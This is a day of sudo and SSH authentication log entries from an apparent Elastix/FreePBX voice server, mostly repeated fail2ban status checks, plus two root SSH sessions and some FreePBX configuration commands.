                      Jun 9 09:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:17:51 voicesrv01 sshd[15163]: Accepted password for root from 98.242.248.14 port 58874 ssh2
                      Jun 9 09:17:51 voicesrv01 sshd[15163]: pam_unix(sshd:session): session opened for user root by (uid=0)
                      Jun 9 09:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:20:02 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKWEBGROUP asterisk
                      Jun 9 09:20:02 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKWEBUSER asterisk
                      Jun 9 09:20:02 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKGROUP asterisk
                      Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPASTERISKUSER asterisk
                      Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPDEVGROUP asterisk
                      Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting AMPDEVUSER asterisk
                      Jun 9 09:20:03 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/freepbx_setting ASTMANAGERHOST localhost
                      Jun 9 09:20:05 voicesrv01 sudo: root : TTY=pts/0 ; PWD=/usr/share/freepbx/tmp/freepbx-2.11.0 ; USER=asterisk ; COMMAND=/var/lib/asterisk/bin/retrieve_conf --run-install --skip-registry-checks
                      Jun 9 09:23:59 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:23:59 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table httpd
                      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table asterisk
                      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table sshd
                      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table vsftpd
                      Jun 9 09:24:00 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --dumpiptables
                      Jun 9 09:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:40:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:50:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 10:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 11:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 12:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:08:18 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table httpd
                      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table asterisk
                      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table sshd
                      Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table vsftpd
                      Jun 9 13:08:20 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --dumpiptables
                      Jun 9 13:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 13:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 14:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 14:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 14:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 14:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 14:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 14:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 14:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 14:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 14:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 14:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 14:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 14:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 15:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 15:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 15:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 15:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 15:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 15:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 15:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 15:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 15:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 15:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 15:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 15:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 16:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 16:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 16:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 16:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 16:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 16:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 16:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 16:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 16:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 16:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 16:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 16:51:21 voicesrv01 sshd[15163]: pam_unix(sshd:session): session closed for user root
                      Jun 9 16:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 17:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 17:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 17:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 17:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 17:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 17:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 17:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 17:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 17:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 17:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 17:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 17:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 18:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 18:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 18:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 18:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 18:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 18:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 18:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 18:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 18:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 18:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 18:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 18:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 19:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 19:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 19:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 19:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 19:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 19:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 19:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 19:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 19:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 19:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 19:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 19:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 20:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 20:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 20:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 20:14:09 voicesrv01 sshd[30173]: Accepted password for root from 98.242.248.14 port 52790 ssh2
                      Jun 9 20:14:09 voicesrv01 sshd[30173]: pam_unix(sshd:session): session opened for user root by (uid=0)
                      Jun 9 20:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 20:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 20:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 20:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 20:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 20:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 20:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 20:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 20:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 21:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 21:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 21:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 21:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 21:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 21:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 21:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 21:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 21:40:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 21:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
